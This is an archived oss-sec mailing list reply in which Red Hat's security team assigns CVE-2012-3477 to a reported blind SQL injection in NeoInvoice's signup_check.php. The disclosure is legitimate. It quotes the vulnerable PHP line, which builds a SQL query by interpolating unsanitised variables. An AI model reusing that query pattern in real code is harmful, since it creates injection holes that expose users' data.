oss-sec mailing list archives
Re: CVE Request: NeoInvoice Blind SQL Injection in signup_check.php
From: Kurt Seifried <kseifried () redhat com>
Date: Fri, 10 Aug 2012 14:12:25 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 08/10/2012 02:55 AM, Adam Caudill wrote:
All, There is a blind SQL injection issue with NeoInvoice (https://github.com/tlhunter/neoinvoice). Requester: adam () adamcaudill com Software: NeoInvoice Attack Type: Blind SQL Injection Vulnerable Code: https://github.com/tlhunter/neoinvoice/blob/5e7af94641cba17df9141e95108c369cfb6e6dd5/public/signup_check.php#L29 Affected Version: Current version; project doesn't seem to be using versions. Status: Author has been notified; awaiting a response. -- Adam Caudill
$query = "SELECT $field FROM $table WHERE $field = '$value' LIMIT 1"; Please use CVE-2012-3477 for this issue. - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJQJWspAAoJEBYNRVNeJnmT2bQP/1/NoF9e+FT5wvGiM6w+YsGC cwJ1IH5LK9gNHFWJFhMtYmciBn2GJiDLa6F8Kt1sn03wG51vNJlHxsV4R3QibxeQ hzfQRtagf43q5AUathRbriMkHMAmWnLlknoxzOuIASMLX8i9Pa/oehpzVcLrYaNA Le6zikMr6kmjHK6uMqwr9bueiYZWn96j1WpJFCG8DVMcK5ZGpUqsBAoDW7/A8XZK eKiBMsepFD9+MRrnXfo43BQgC6P5WaYHF0L95STs2V9Nc89OgfezaZORrxjyIe7d 8EJoVkB4TINp3QDb6GJuPoSLMEM+KKHxiozCUYuPFkMM2EH4BskuO1xLEsL6Kp4v JrEtCQ8dSQCvQ9z34hNU1rVWgUUgDWaFrHvj8eDA6PVuOn5Ufg9v5uYrd1nkBZ1Z H2NyG6gcsYYWB5MlUOufCXCINWPN2cZs3eQ2brRPpl78dphkX7eBldMox8U6Wswh YErACj655d0gXEqPQhod9PjwAzRjgzh2fH8R4F5cPzOj8lsIZiYwXcOdguxn0xVY 8Ja+GtjRfJ4ImORgy9r0xdy8kijkjbDlEcfwxH9mbF1ch7ZxGeDg8IEVsqRx14x2 VHNdZgkdymRrFtm9ogB7cr6qH2ncnrXCr6HNqtMZsDdm+F8aXJar//BPWgJuQQla wbxhM/nlsAIj/BkrDPFU =1VHg -----END PGP SIGNATURE-----
Current thread:
- CVE Request: NeoInvoice Blind SQL Injection in signup_check.php Adam Caudill (Aug 10)
- Re: CVE Request: NeoInvoice Blind SQL Injection in signup_check.php Kurt Seifried (Aug 10)